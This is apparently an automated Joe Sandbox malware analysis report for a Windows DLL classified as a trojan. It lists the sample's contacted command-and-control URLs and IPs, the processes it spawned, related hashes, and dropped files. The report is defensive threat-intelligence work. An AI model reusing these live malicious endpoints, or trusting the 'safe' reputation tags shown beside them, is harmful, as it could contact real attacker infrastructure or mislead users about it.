              https://berukoneru.website/tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.etatrue
              • Avira URL Cloud: safe
              		unknown
              https://berukoneru.website/tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.etatrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/MicrosoftEdgeDownload&quot;loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpfalse
                		high
                http://nuget.org/NuGet.exepowershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpfalse
                  		high
                  https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctfregsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.micloaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpfalse
                    		high
                    https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqregsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lomregsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://windows.update3.com/regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsrundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpfalse
                      		high
                      https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.microsoftqpowershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://windows.update3.com/Pregsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmpfalse
                            		high
                            https://windows.update3.com/iregsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            3.20.161.64
                            		unknownUnited States
                            		16509AMAZON-02UStrue
                            79.110.52.144
                            		berukoneru.websiteRomania
                            		60233V4ESCROW-ASROtrue
                            18.219.227.107
                            		unknownUnited States
                            		16509AMAZON-02UStrue
                            3.12.124.139
                            		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                            		16509AMAZON-02USfalse

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:539453
                            Start date:14.12.2021
                            Start time:10:19:18
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 15m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:61b85f75e6a7c.dll
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:50
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winDLL@59/52@18/5
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 18% (good quality ratio 17.2%)
                            • Quality average: 79.3%
                            • Quality standard deviation: 28.4%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 201
                            • Number of non-executed functions: 318
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 2.20.205.141, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172, 23.54.112.217
                            • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, fs.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, www.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            10:21:03API Interceptor12x Sleep call for process: rundll32.exe modified
                            10:21:17API Interceptor5x Sleep call for process: regsvr32.exe modified
                            10:21:18API Interceptor6x Sleep call for process: loaddll32.exe modified
                            10:21:53API Interceptor147x Sleep call for process: powershell.exe modified
                            10:22:40API Interceptor1x Sleep call for process: control.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            18.219.227.107justifika Payment details.exeGet hashmaliciousBrowse
                            • www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&I4ah=w2MTqnnpWZSPKVw0
                            Pedido.exeGet hashmaliciousBrowse
                            • www.flexsupplychain.com/d17y/?0rZP=OmVFy8OLQw4Gp9JzKyep83yL4HSb/lijK6/1gM7i85D6SqIxyGpApTTHLP2WXKAWPC8w&0Pzhp=yTe4ShzxzhvLNrf
                            shedy.exeGet hashmaliciousBrowse
                            • www.w6ef2.rest/sy20/?IvC=xs0F11qeGlDb3CqwQ31iFoqJ6gZSv9pqRXHO06OK2OaZwbm3xdnECHW1XX4Ap/B0LhPG&P2M=j0Gtn6WPbPNLw
                            3.12.124.139justifika Payment details.exeGet hashmaliciousBrowse
                            • www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&t48=rZAh

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comjustifika Payment details.exeGet hashmaliciousBrowse
                            • 18.219.227.107
                            Pedido.exeGet hashmaliciousBrowse
                            • 18.219.227.107
                            shedy.exeGet hashmaliciousBrowse
                            • 18.219.227.107
                            Tax payment invoice - Saturday, November 29, 2021,pdf.exeGet hashmaliciousBrowse
                            • 3.12.124.139
                            PKWvT2Siyf.exeGet hashmaliciousBrowse
                            • 3.14.206.87
                            BZfCJr1SBC.exeGet hashmaliciousBrowse
                            • 3.22.144.145
                            Ez6r9fZIXc.exeGet hashmaliciousBrowse
                            • 3.136.35.220
                            20211511.docGet hashmaliciousBrowse
                            • 3.14.206.87
                            Swift Copy MT103.exeGet hashmaliciousBrowse
                            • 3.14.206.87
                            KC5w2SJOpt.exeGet hashmaliciousBrowse
                            • 3.142.112.3
                            Pnfl0Fu5gE.exeGet hashmaliciousBrowse
                            • 3.20.112.42
                            DBS_Swift $12,863.exeGet hashmaliciousBrowse
                            • 18.116.226.211
                            PO# 11381.exeGet hashmaliciousBrowse
                            • 3.130.243.177
                            OXkB3xMeAr.exeGet hashmaliciousBrowse
                            • 3.133.163.136
                            Exq3dXFDHe.exeGet hashmaliciousBrowse
                            • 18.116.226.211
                            Quotation 29092021.exeGet hashmaliciousBrowse
                            • 3.133.163.136
                            1 Balance_PI Dt. 21.9.2021.xlsxGet hashmaliciousBrowse
                            • 13.58.168.69
                            HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                            • 3.139.183.122
                            2021091400983746_pdf.exeGet hashmaliciousBrowse
                            • 3.133.163.136
                            chUG6brzt9.exeGet hashmaliciousBrowse
                            • 3.139.183.122

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            AMAZON-02US9hPGWxrcih.dllGet hashmaliciousBrowse
                            • 18.196.46.14
                            9hPGWxrcih.dllGet hashmaliciousBrowse
                            • 18.196.46.14
                            dF05T33wbdGet hashmaliciousBrowse
                            • 34.249.145.219
                            w5CIVsOxCJGet hashmaliciousBrowse
                            • 3.156.46.99
                            MidM0aH8AtGet hashmaliciousBrowse
                            • 54.171.230.55
                            arm7Get hashmaliciousBrowse
                            • 13.222.54.154
                            0x0005000000012636-65.exeGet hashmaliciousBrowse
                            • 54.239.28.85
                            yxmaor9bkzqc8cpGet hashmaliciousBrowse
                            • 34.249.145.219
                            Insurance_template.rtfGet hashmaliciousBrowse
                            • 54.239.28.85
                            RT.msiGet hashmaliciousBrowse
                            • 52.219.96.48
                            diBfYpFaeM.exeGet hashmaliciousBrowse
                            • 52.219.66.7
                            0AD97BE849C854DDEA3A0DF0597C8E9B2DC8DD4D274B9.exeGet hashmaliciousBrowse
                            • 3.142.167.54
                            Invoice_#fdp..exeGet hashmaliciousBrowse
                            • 54.239.28.85
                            bHqFqBDrr5.dllGet hashmaliciousBrowse
                            • 13.32.157.71
                            29MA429K1PGet hashmaliciousBrowse
                            • 54.171.230.55
                            RFQ-PO 31336.xlsmGet hashmaliciousBrowse
                            • 3.69.238.46
                            41111.xlsxGet hashmaliciousBrowse
                            • 3.112.194.196
                            MiYUB3l97mGet hashmaliciousBrowse
                            • 143.204.98.23
                            Item No 31111.xlsxGet hashmaliciousBrowse
                            • 3.112.194.196
                            ZjwFelKtCqGet hashmaliciousBrowse
                            • 34.249.145.219
                            V4ESCROW-ASROB2EIJMKgSt.exeGet hashmaliciousBrowse
                            • 79.110.52.59
                            #Uacac#Uc801 PO#8080715-10-2021 KTR-151020-21-#Uc8fc#Ubb38.exeGet hashmaliciousBrowse
                            • 79.110.52.111
                            LiicMQN1iQ.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            JCn2Ugbqee.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            0kZQoyA8lm.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            C1QpGTKpb4.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            2GQL8eREln.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            h9ODxK7W0a.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            FaBrzRLl62.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            lo0al3uj17.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            TQ1p5E2sT4.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            TuOb8Fs15Q.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            b4rNxlfTda.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            K7Cwu7R32X.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            xJXQD5aK51.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            EIsQYYsTbB.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            d5zZ6bB1nU.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            xNzTyEUy1e.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            P2vZPsJOCy.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            kwN6azY1TS.exeGet hashmaliciousBrowse
                            • 91.245.253.52
                            AMAZON-02US9hPGWxrcih.dllGet hashmaliciousBrowse
                            • 18.196.46.14
                            9hPGWxrcih.dllGet hashmaliciousBrowse
                            • 18.196.46.14
                            dF05T33wbdGet hashmaliciousBrowse
                            • 34.249.145.219
                            w5CIVsOxCJGet hashmaliciousBrowse
                            • 3.156.46.99
                            MidM0aH8AtGet hashmaliciousBrowse
                            • 54.171.230.55
                            arm7Get hashmaliciousBrowse
                            • 13.222.54.154
                            0x0005000000012636-65.exeGet hashmaliciousBrowse
                            • 54.239.28.85
                            yxmaor9bkzqc8cpGet hashmaliciousBrowse
                            • 34.249.145.219
                            Insurance_template.rtfGet hashmaliciousBrowse
                            • 54.239.28.85
                            RT.msiGet hashmaliciousBrowse
                            • 52.219.96.48
                            diBfYpFaeM.exeGet hashmaliciousBrowse
                            • 52.219.66.7
                            0AD97BE849C854DDEA3A0DF0597C8E9B2DC8DD4D274B9.exeGet hashmaliciousBrowse
                            • 3.142.167.54
                            Invoice_#fdp..exeGet hashmaliciousBrowse
                            • 54.239.28.85
                            bHqFqBDrr5.dllGet hashmaliciousBrowse
                            • 13.32.157.71
                            29MA429K1PGet hashmaliciousBrowse
                            • 54.171.230.55
                            RFQ-PO 31336.xlsmGet hashmaliciousBrowse
                            • 3.69.238.46
                            41111.xlsxGet hashmaliciousBrowse
                            • 3.112.194.196
                            MiYUB3l97mGet hashmaliciousBrowse
                            • 143.204.98.23
                            Item No 31111.xlsxGet hashmaliciousBrowse
                            • 3.112.194.196
                            ZjwFelKtCqGet hashmaliciousBrowse
                            • 34.249.145.219

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            ce5f3254611a8c095a3d821d44539877R0c5Z733SP.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            NF4JgDw9LJ.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            dec_order.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            g8DE6t8o5H.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            lepdHVzKGs.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            pwY7l6DVfX.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            JlF5uYbq4K.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            SYBJyKTdhN.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            kBeiYpbuqG.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            fd862143z1.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            bHqFqBDrr5.dllGet hashmaliciousBrowse
                            • 79.110.52.144
                            34CCAE63B50259B758A5B68F579077E5152D9568CD1F9.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            r6yDVfoNWL.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            VAxh74b69I.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            KT66ytYEtw.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            MoDa1Ehl7V.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            SecuriteInfo.com.Win64.Packed.Enigma.BV.28332.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            DY6NIa6uCJ.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            EiciKS0ik4.exeGet hashmaliciousBrowse
                            • 79.110.52.144
                            I8sg3HvUsH.exeGet hashmaliciousBrowse
                            • 79.110.52.144

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11606
                            Entropy (8bit):4.883977562702998
                            Encrypted:false
                            SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                            MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                            SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                            SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                            SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                            Malicious:false
                            Reputation:unknown
                            Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.9260988789684415
                            Encrypted:false
                            SSDEEP:3:Nlllulb/lj:NllUb/l
                            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
